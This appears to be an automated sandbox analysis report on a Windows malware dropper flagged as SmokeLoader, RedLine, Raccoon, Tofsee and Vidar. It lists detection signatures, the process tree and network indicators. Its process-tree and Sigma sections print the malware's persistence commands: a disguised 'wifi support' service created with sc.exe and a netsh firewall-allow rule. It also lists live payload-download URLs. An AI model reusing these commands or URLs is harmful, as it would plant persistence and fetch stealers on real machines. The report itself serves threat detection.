Windows Analysis Report ECD2MpEBSf.exe

Overview

General Information

Sample Name: ECD2MpEBSf.exe
Analysis ID: 553404
MD5: 31f0d01ee1fd6876668692791657d97e
SHA1: a45a34a020ad13c9373bd14c45268004f505e1e1
SHA256: 8facf32116a5f68467c71032d3a207abaa20fbcc56fcab6a3db650b4d30ad115
Tags: exe, RedLineStealer

Detection

Raccoon RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • ECD2MpEBSf.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\ECD2MpEBSf.exe" MD5: 31F0D01EE1FD6876668692791657D97E)
    • ECD2MpEBSf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\ECD2MpEBSf.exe" MD5: 31F0D01EE1FD6876668692791657D97E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • BB8A.exe (PID: 6816 cmdline: C:\Users\user\AppData\Local\Temp\BB8A.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • CCB2.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\CCB2.exe MD5: 043B44289E31BD54357F9A5C21833259)
        • D936.exe (PID: 7124 cmdline: C:\Users\user\AppData\Local\Temp\D936.exe MD5: 9517CA2BC20EC061024C1209970CCD2E)
          • cmd.exe (PID: 6412 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5468 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4608 cmdline: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6464 cmdline: C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1716 cmdline: "C:\Windows\System32\sc.exe" start qeprvgom MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6744 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 3D34.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3D34.exe (PID: 2832 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 3D34.exe (PID: 472 cmdline: C:\Users\user\AppData\Local\Temp\3D34.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • A332.exe (PID: 6580 cmdline: C:\Users\user\AppData\Local\Temp\A332.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • CADF.exe (PID: 5628 cmdline: C:\Users\user\AppData\Local\Temp\CADF.exe MD5: CBE604877A46CEEBA112802BC17FFEF8)
          • CADF.exe (PID: 5504 cmdline: C:\Users\user\AppData\Local\Temp\CADF.exe MD5: CBE604877A46CEEBA112802BC17FFEF8)
        • D502.exe (PID: 2248 cmdline: C:\Users\user\AppData\Local\Temp\D502.exe MD5: 1B1E4286625BB189A526E910F2031C7B)
        • E3A9.exe (PID: 5272 cmdline: C:\Users\user\AppData\Local\Temp\E3A9.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 5620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • FB58.exe (PID: 5136 cmdline: C:\Users\user\AppData\Local\Temp\FB58.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • jgdhbua (PID: 6700 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
    • jgdhbua (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6964 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6876 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • krmdinzg.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe" MD5: C8DE2E3F0DF5D9E1C126828B1444DBEA)
    • svchost.exe (PID: 3000 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • jgdhbua (PID: 5664 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
    • jgdhbua (PID: 6308 cmdline: C:\Users\user\AppData\Roaming\jgdhbua MD5: 31F0D01EE1FD6876668692791657D97E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\A4DE.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth | 0x3b87:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(5 of 28 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.ECD2MpEBSf.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
17.3.D936.exe.22d0000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
18.2.3D34.exe.430f910.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
18.2.3D34.exe.444ba90.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
32.2.krmdinzg.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
(5 of 20 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe", ParentImage: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe, ParentProcessId: 6888, ProcessCommandLine: svchost.exe, ProcessId: 3000
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\, ProcessId: 5468
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe", ParentImage: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe, ParentProcessId: 6888, ProcessCommandLine: svchost.exe, ProcessId: 3000
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6744
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\D936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\D936.exe, ParentProcessId: 7124, ProcessCommandLine: C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4608

                      Jbx Signature Overview

                      AV Detection:

Yara detected Raccoon Stealer
Source: Yara match; File source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://unicupload.top/install5.exe; URL Reputation: Label: phishing
Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Source: http://81.163.30.181/l2.exe; Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://185.163.204.22/capibar; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe; Avira URL Cloud: Label: malware
Source: http://81.163.30.181/l3.exe; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\888A.exe; Avira: detection malicious, Label: HEUR/AGEN.1212012
Source: C:\Users\user\AppData\Local\Temp\CADF.exe; Avira: detection malicious, Label: HEUR/AGEN.1212012
Source: C:\Users\user\AppData\Local\Temp\3D34.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: ECD2MpEBSf.exe; Virustotal: Detection: 36%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3D34.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\3D34.exe; ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\6C37.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\A332.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\A332.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\A4DE.exe; ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe; ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\FB58.exe; Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\FB58.exe; ReversingLabs: Detection: 76%
Machine Learning detection for sample
Source: ECD2MpEBSf.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6C37.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D936.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\krmdinzg.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jgdhbua; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A332.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D34.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A4DE.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB58.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E3A9.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D502.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9889.exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 17.3.D936.exe.22d0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.D936.exe.22b0e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.krmdinzg.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 35.2.svchost.exe.e70000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 15.3.CCB2.exe.7b0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.3.krmdinzg.exe.7c0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.krmdinzg.exe.6c0e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 32.2.krmdinzg.exe.7c0000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 17.2.D936.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 15.2.CCB2.exe.680e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_006876C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00684A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_00687760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_006873E0 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Code function: 15_2_006879F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe; Unpacked PE file: 15.2.CCB2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D936.exe; Unpacked PE file: 17.2.D936.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe; Unpacked PE file: 32.2.krmdinzg.exe.400000.0.unpack
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49952 version: TLS 1.0
Source: ECD2MpEBSf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\BB8A.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: Binary string: profapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: BB8A.exe, 0000000C.00000000.759454697.0000000000413000.00000002.00020000.sdmp, BB8A.exe, 0000000C.00000000.765793505.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000010.00000002.807243826.0000000004DE0000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777349843.00000000049D7000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: C:\nobaniz_sakalacato34.pdbh source: ECD2MpEBSf.exe, 00000000.00000002.667356464.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000000.00000000.661810290.0000000000401000.00000020.00020000.sdmp, ECD2MpEBSf.exe, 00000001.00000000.664620927.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000000.751866281.0000000000401000.00000020.00020000.sdmp, jgdhbua, 00000009.00000002.758107473.0000000000401000.00000020.00020000.sdmp, jgdhbua, 0000000B.00000000.755033215.0000000000401000.00000020.00020000.sdmp
Source: Binary string: ;C:\bajudag\zexi\yedu49\hecicu\2-tiwi\cabilok\fes.pdbh source: D936.exe, 00000011.00000000.776580962.0000000000401000.00000020.00020000.sdmp, krmdinzg.exe, 00000020.00000000.795753078.0000000000401000.00000020.00020000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.778942214.0000000000B3E000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.777377914.0000000000B3E000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: CCB2.exe, 0000000F.00000000.768135951.0000000000401000.00000020.00020000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.783088136.0000000004CF1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000010.00000003.783105671.0000000004EC0000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000010.00000003.783122739.0000000004EC6000.00000004.00000040.sdmp
